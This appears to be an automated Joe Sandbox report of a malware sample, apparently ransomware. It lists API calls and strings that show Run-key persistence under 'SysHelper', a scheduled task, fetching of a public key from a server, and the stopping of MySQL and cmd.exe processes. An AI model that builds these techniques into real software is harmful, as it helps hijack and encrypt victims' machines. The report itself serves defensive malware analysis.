Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3

Strings

OpenSSL: FATAL, xrefs: 00454BC7
OPENSSL, xrefs: 00454B77

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

SysHelper, xrefs: 004123D6
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

invalid string position, xrefs: 00418342
string too long, xrefs: 00418338

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
--Task, xrefs: 0040DBB5
Comment, xrefs: 0040DBFF

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: e319be2d829e19d2b37083f58621ed3e6e1b196228c1693d1d3392fa3d1c8cc5
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: e319be2d829e19d2b37083f58621ed3e6e1b196228c1693d1d3392fa3d1c8cc5
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
GetLastError.KERNEL32(?,?,00000000), ref: 00465503
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5

Strings

',', xrefs: 0046560B
fopen(', xrefs: 00465611
.\crypto\bio\bss_file.c, xrefs: 004655F0, 0046562F, 00465640

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: ','$.\crypto\bio\bss_file.c$fopen('
API String ID: 1717984340-2085858615
Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
String ID:
API String ID: 790675137-0
Opcode ID: 056817dd19d1f9791209dcb1a035a563dccb51f4cf54a38a2a3efd7796871d8b
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 056817dd19d1f9791209dcb1a035a563dccb51f4cf54a38a2a3efd7796871d8b
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: cd2d1ebaeb73b000566b27407120cf5776c271d9576cf7e4bfe0b84696e73251
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: cd2d1ebaeb73b000566b27407120cf5776c271d9576cf7e4bfe0b84696e73251
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

Shell32.dll, xrefs: 0040F32C
\, xrefs: 0040F548
SHGetFolderPathW, xrefs: 0040F34D

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: 29df590b87079fe373604ab2510f8e0d2be2aa40337168becaf5725ce843f379
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: 29df590b87079fe373604ab2510f8e0d2be2aa40337168becaf5725ce843f379
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

Error encrypting message: %s, xrefs: 0040CE67
 , xrefs: 0040CCAF
\\n, xrefs: 0040CC1B

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: a76fe116d2cf907a06887943d6a3c14b31df6cbe4eee719617fc4b2985731729
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: a76fe116d2cf907a06887943d6a3c14b31df6cbe4eee719617fc4b2985731729
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

ENCRYPTED, xrefs: 004633BC
Proc-Type: , xrefs: 0046337C
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
DEK-Info: , xrefs: 00463422

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

SysHelper, xrefs: 0040C6EB, 0040C71D
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32(?,?), ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32

Strings

{"public_key":", xrefs: 0041EA2E
bowsakkdestx.txt, xrefs: 0041EA67

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
String ID: bowsakkdestx.txt${"public_key":"
API String ID: 2805819797-1771568745
Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

0123456789abcdef, xrefs: 004574C4
+, xrefs: 00457475
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789ABCDEF, xrefs: 004574D6
, xrefs: 00457482

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

